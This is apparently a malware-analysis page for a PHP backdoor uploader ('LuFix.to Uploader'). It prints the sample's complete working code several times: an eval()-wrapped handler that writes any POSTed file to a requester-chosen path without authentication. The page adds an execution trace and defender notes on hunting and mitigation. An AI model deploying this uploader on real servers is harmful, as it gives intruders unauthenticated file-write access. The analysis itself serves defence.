PHP Malware Analysis

uploader.phtml

md5: 69a677fa956b523a859e529e807476ec


Screenshot


Attributes

Execution

Input


Deobfuscated PHP code

<h4>LuFix.to Uploader</h4>
<input type="file" id="upload_files" name="upload_files" multiple="multiple">
<button id="b" value="upload" onclick='upload("upload_files",0);'>Upload</button>
<br><p>Status : <span id="status" style="color:red;">No file added</span></p>
<script>
// Analyst note: client half of the uploader. It reads one file chosen in the
// browser and POSTs its raw bytes back to this same script, with the file name
// in the `name` query parameter. Nothing in this function authenticates the
// user or restricts what is sent.
//   fileInputId - id of the <input type="file"> element whose file is read
//   fileIndex   - index into that element's FileList
// In web server logs this appears as POST <this script>?name=<file> with the
// file bytes as the body (a Blob is sent, not a multipart form).
function upload(fileInputId, fileIndex)
    {
		var url = window.location.pathname;
		// Last path segment of the current URL: the request goes back to whatever
		// file name this page was served under.
		var scriptname = url.substring(url.lastIndexOf('/')+1);
		// The name is always read from the element with id 'upload_files',
		// regardless of fileInputId; the regex keeps the part after the last
		// slash or backslash.
		var filename = document.getElementById('upload_files').value;
		var filename = filename.match(/[^\\/]*$/)[0];
		document.getElementById("status").textContent = "Uploading the file "+filename+", please wait..";
		document.getElementById("status").style.color = "blue";
        // take the file from the input
        var file = document.getElementById(fileInputId).files[fileIndex];
        var reader = new FileReader();
        reader.readAsBinaryString(file); // alternatively you can use readAsDataURL
        reader.onloadend  = function(evt)
        {
                // create XHR instance
                // Analyst note: no `var`, so xhr becomes an implicit global.
                xhr = new XMLHttpRequest();

                // send the file through POST
                // Analyst note: filename is concatenated into the query string
                // without URL-encoding.
                xhr.open("POST", scriptname+"?name="+filename, true);

                // make sure we have the sendAsBinary method on all browsers
                XMLHttpRequest.prototype.mySendAsBinary = function(text){
                    var data = new ArrayBuffer(text.length);
                    var ui8a = new Uint8Array(data, 0);
                    // Keep the low byte of each char code to rebuild the file bytes.
                    for (var i = 0; i < text.length; i++) ui8a[i] = (text.charCodeAt(i) & 0xff);

                    if(typeof window.Blob == "function")
                    {
                         var blob = new Blob([data]);
                    }else{
                         var bb = new (window.MozBlobBuilder || window.WebKitBlobBuilder || window.BlobBuilder)();
                         bb.append(data);
                         var blob = bb.getBlob();
                    }

                    this.send(blob);
                }

                // let's track upload progress
                var eventSource = xhr.upload || xhr;
                eventSource.addEventListener("progress", function(e) {
                    // get percentage of how much of the current file has been sent
                    var position = e.position || e.loaded;
                    var total = e.totalSize || e.total;
                    // Analyst note: percentage is computed but never used.
                    var percentage = Math.round((position/total)*100);

                    // here you should write your own code how you wish to proces this
                });

                // state change observer - we need to know when and if the file was successfully uploaded
                xhr.onreadystatechange = function()
                {
                    if(xhr.readyState == 4)
                    {
                        if(xhr.status == 200)
                        {
                            // process success
							document.getElementById("status").textContent = "The file "+filename+" Uploaded successfully in same folder.";
							document.getElementById("status").style.color = "green";
                        }else{
                            // process error
                            // Analyst note: empty branch; a non-200 response
                            // leaves the "Uploading" status text in place.
                        }
                    }
                };

                // start sending
                xhr.mySendAsBinary(evt.target.result);
        };
    }
</script>
<?php 
// Analyst note: server half of the uploader. The handler is kept in a string
// literal and only runs through eval(); the execution trace on this page shows
// that eval call. Why it is wrapped this way is not shown here - presumably to
// keep the fopen/fwrite calls out of the top-level code (unconfirmed).
//
// What the evaluated code does when the `name` query parameter is non-empty:
//   - opens the raw request body (php://input) for reading;
//   - opens the path given in $_GET["name"] with mode "w+", so the requester
//     chooses the destination and an existing file there is truncated;
//   - copies the body across with fgets() (length argument 4096) until fgets()
//     yields an empty result, then closes both handles and returns from the eval.
// No authentication, no check on the path or extension, and the fopen()
// results are not tested.
//
// Defender view: this is an unauthenticated arbitrary file write. Hunt for POST
// requests to this file that carry a `name` query parameter, for files created
// or modified right after them, and for eval() of a string literal containing
// both php://input and fopen($_GET[...]). The trace on this page shows the
// script running from /var/www/html/uploads/; an uploads directory in which
// PHP is not executed would stop this file from running at all.
$text = 'if(!empty($_GET["name"])){
	$inputHandler = fopen("php://input", "r");
	$fileHandler = fopen($_GET["name"], "w+");
	while(true) {
		$buffer = fgets($inputHandler, 4096);
		if (strlen($buffer) == 0) {
			fclose($inputHandler);
			fclose($fileHandler);
			return true;
		}
		fwrite($fileHandler, $buffer);
	}
}';
// Analyst note: runs the handler above on every request to this file.
eval($text);

Execution traces

data/traces/69a677fa956b523a859e529e807476ec_trace-1676252833.1268.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:47:39.024611]
1	0	1	0.000171	393528
1	3	0	0.000225	397816	{main}	1		/var/www/html/uploads/uploader.phtml	0	0
1		A						/var/www/html/uploads/uploader.phtml	77	$text = 'if(!empty($_GET["name"])){\r\n\t$inputHandler = fopen("php://input", "r");\r\n\t$fileHandler = fopen($_GET["name"], "w+");\r\n\twhile(true) {\r\n\t\t$buffer = fgets($inputHandler, 4096);\r\n\t\tif (strlen($buffer) == 0) {\r\n\t\t\tfclose($inputHandler);\r\n\t\t\tfclose($fileHandler);\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\tfwrite($fileHandler, $buffer);\r\n\t}\r\n}'
2	4	0	0.000301	402208	eval	1	'if(!empty($_GET["name"])){\r\n\t$inputHandler = fopen("php://input", "r");\r\n\t$fileHandler = fopen($_GET["name"], "w+");\r\n\twhile(true) {\r\n\t\t$buffer = fgets($inputHandler, 4096);\r\n\t\tif (strlen($buffer) == 0) {\r\n\t\t\tfclose($inputHandler);\r\n\t\t\tfclose($fileHandler);\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\tfwrite($fileHandler, $buffer);\r\n\t}\r\n}'	/var/www/html/uploads/uploader.phtml	90	0
2	4	1	0.000328	402208
1	3	1	0.000336	399000
			0.000362	315040
TRACE END   [2023-02-12 23:47:39.024836]


Generated HTML code

<html><head></head><body><h4>LuFix.to Uploader</h4>
<input type="file" id="upload_files" name="upload_files" multiple="multiple">
<button id="b" value="upload" onclick="upload(&quot;upload_files&quot;,0);">Upload</button>
<br><p>Status : <span id="status" style="color:red;">No file added</span></p>
<script>
// Analyst note: this is the script as delivered to the browser in the
// generated page. It reads one file chosen in the browser and POSTs its raw
// bytes back to the same script, with the file name in the `name` query
// parameter. Nothing in this function authenticates the user or restricts
// what is sent.
//   fileInputId - id of the <input type="file"> element whose file is read
//   fileIndex   - index into that element's FileList
// In web server logs this appears as POST <this script>?name=<file> with the
// file bytes as the body (a Blob is sent, not a multipart form).
function upload(fileInputId, fileIndex)
    {
		var url = window.location.pathname;
		// Last path segment of the current URL: the request goes back to whatever
		// file name this page was served under.
		var scriptname = url.substring(url.lastIndexOf('/')+1);
		// The name is always read from the element with id 'upload_files',
		// regardless of fileInputId; the regex keeps the part after the last
		// slash or backslash.
		var filename = document.getElementById('upload_files').value;
		var filename = filename.match(/[^\\/]*$/)[0];
		document.getElementById("status").textContent = "Uploading the file "+filename+", please wait..";
		document.getElementById("status").style.color = "blue";
        // take the file from the input
        var file = document.getElementById(fileInputId).files[fileIndex];
        var reader = new FileReader();
        reader.readAsBinaryString(file); // alternatively you can use readAsDataURL
        reader.onloadend  = function(evt)
        {
                // create XHR instance
                // Analyst note: no `var`, so xhr becomes an implicit global.
                xhr = new XMLHttpRequest();

                // send the file through POST
                // Analyst note: filename is concatenated into the query string
                // without URL-encoding.
                xhr.open("POST", scriptname+"?name="+filename, true);

                // make sure we have the sendAsBinary method on all browsers
                XMLHttpRequest.prototype.mySendAsBinary = function(text){
                    var data = new ArrayBuffer(text.length);
                    var ui8a = new Uint8Array(data, 0);
                    // Keep the low byte of each char code to rebuild the file bytes.
                    for (var i = 0; i < text.length; i++) ui8a[i] = (text.charCodeAt(i) & 0xff);

                    if(typeof window.Blob == "function")
                    {
                         var blob = new Blob([data]);
                    }else{
                         var bb = new (window.MozBlobBuilder || window.WebKitBlobBuilder || window.BlobBuilder)();
                         bb.append(data);
                         var blob = bb.getBlob();
                    }

                    this.send(blob);
                }

                // let's track upload progress
                var eventSource = xhr.upload || xhr;
                eventSource.addEventListener("progress", function(e) {
                    // get percentage of how much of the current file has been sent
                    var position = e.position || e.loaded;
                    var total = e.totalSize || e.total;
                    // Analyst note: percentage is computed but never used.
                    var percentage = Math.round((position/total)*100);

                    // here you should write your own code how you wish to proces this
                });

                // state change observer - we need to know when and if the file was successfully uploaded
                xhr.onreadystatechange = function()
                {
                    if(xhr.readyState == 4)
                    {
                        if(xhr.status == 200)
                        {
                            // process success
							document.getElementById("status").textContent = "The file "+filename+" Uploaded successfully in same folder.";
							document.getElementById("status").style.color = "green";
                        }else{
                            // process error
                            // Analyst note: empty branch; a non-200 response
                            // leaves the "Uploading" status text in place.
                        }
                    }
                };

                // start sending
                xhr.mySendAsBinary(evt.target.result);
        };
    }
</script>
</body></html>

Original PHP code

<h4>LuFix.to Uploader</h4>
<input type="file" id="upload_files" name="upload_files" multiple="multiple">
<button id="b" value="upload" onclick='upload("upload_files",0);'>Upload</button>
<br><p>Status : <span id="status" style="color:red;">No file added</span></p>
<script>
// Analyst note (annotation added to the sample listing; not part of the file
// whose md5 is given on this page): client half of the uploader. It reads one
// file chosen in the browser and POSTs its raw bytes back to this same script,
// with the file name in the `name` query parameter. Nothing in this function
// authenticates the user or restricts what is sent.
//   fileInputId - id of the <input type="file"> element whose file is read
//   fileIndex   - index into that element's FileList
// In web server logs this appears as POST <this script>?name=<file> with the
// file bytes as the body (a Blob is sent, not a multipart form).
function upload(fileInputId, fileIndex)
    {
		var url = window.location.pathname;
		// Last path segment of the current URL: the request goes back to whatever
		// file name this page was served under.
		var scriptname = url.substring(url.lastIndexOf('/')+1);
		// The name is always read from the element with id 'upload_files',
		// regardless of fileInputId; the regex keeps the part after the last
		// slash or backslash.
		var filename = document.getElementById('upload_files').value;
		var filename = filename.match(/[^\\/]*$/)[0];
		document.getElementById("status").textContent = "Uploading the file "+filename+", please wait..";
		document.getElementById("status").style.color = "blue";
        // take the file from the input
        var file = document.getElementById(fileInputId).files[fileIndex];
        var reader = new FileReader();
        reader.readAsBinaryString(file); // alternatively you can use readAsDataURL
        reader.onloadend  = function(evt)
        {
                // create XHR instance
                // Analyst note: no `var`, so xhr becomes an implicit global.
                xhr = new XMLHttpRequest();

                // send the file through POST
                // Analyst note: filename is concatenated into the query string
                // without URL-encoding.
                xhr.open("POST", scriptname+"?name="+filename, true);

                // make sure we have the sendAsBinary method on all browsers
                XMLHttpRequest.prototype.mySendAsBinary = function(text){
                    var data = new ArrayBuffer(text.length);
                    var ui8a = new Uint8Array(data, 0);
                    // Keep the low byte of each char code to rebuild the file bytes.
                    for (var i = 0; i < text.length; i++) ui8a[i] = (text.charCodeAt(i) & 0xff);

                    if(typeof window.Blob == "function")
                    {
                         var blob = new Blob([data]);
                    }else{
                         var bb = new (window.MozBlobBuilder || window.WebKitBlobBuilder || window.BlobBuilder)();
                         bb.append(data);
                         var blob = bb.getBlob();
                    }

                    this.send(blob);
                }

                // let's track upload progress
                var eventSource = xhr.upload || xhr;
                eventSource.addEventListener("progress", function(e) {
                    // get percentage of how much of the current file has been sent
                    var position = e.position || e.loaded;
                    var total = e.totalSize || e.total;
                    // Analyst note: percentage is computed but never used.
                    var percentage = Math.round((position/total)*100);

                    // here you should write your own code how you wish to proces this
                });

                // state change observer - we need to know when and if the file was successfully uploaded
                xhr.onreadystatechange = function()
                {
                    if(xhr.readyState == 4)
                    {
                        if(xhr.status == 200)
                        {
                            // process success
							document.getElementById("status").textContent = "The file "+filename+" Uploaded successfully in same folder.";
							document.getElementById("status").style.color = "green";
                        }else{
                            // process error
                            // Analyst note: empty branch; a non-200 response
                            // leaves the "Uploading" status text in place.
                        }
                    }
                };

                // start sending
                xhr.mySendAsBinary(evt.target.result);
        };
    }
</script>
<?php
// Analyst note (annotation added to the sample listing; not part of the file
// whose md5 is given on this page): server half of the uploader. The handler
// is kept in a string literal and only runs through eval(); the execution
// trace on this page shows that eval call. Why it is wrapped this way is not
// shown here - presumably to keep the fopen/fwrite calls out of the top-level
// code (unconfirmed).
//
// What the evaluated code does when the `name` query parameter is non-empty:
//   - opens the raw request body (php://input) for reading;
//   - opens the path given in $_GET["name"] with mode "w+", so the requester
//     chooses the destination and an existing file there is truncated;
//   - copies the body across with fgets() (length argument 4096) until fgets()
//     yields an empty result, then closes both handles and returns from the eval.
// No authentication, no check on the path or extension, and the fopen()
// results are not tested.
//
// Defender view: this is an unauthenticated arbitrary file write. Hunt for POST
// requests to this file that carry a `name` query parameter, for files created
// or modified right after them, and for eval() of a string literal containing
// both php://input and fopen($_GET[...]). The trace on this page shows the
// script running from /var/www/html/uploads/; an uploads directory in which
// PHP is not executed would stop this file from running at all.
$text = 'if(!empty($_GET["name"])){
	$inputHandler = fopen("php://input", "r");
	$fileHandler = fopen($_GET["name"], "w+");
	while(true) {
		$buffer = fgets($inputHandler, 4096);
		if (strlen($buffer) == 0) {
			fclose($inputHandler);
			fclose($fileHandler);
			return true;
		}
		fwrite($fileHandler, $buffer);
	}
}';
// Analyst note: runs the handler above on every request to this file.
eval($text);
?>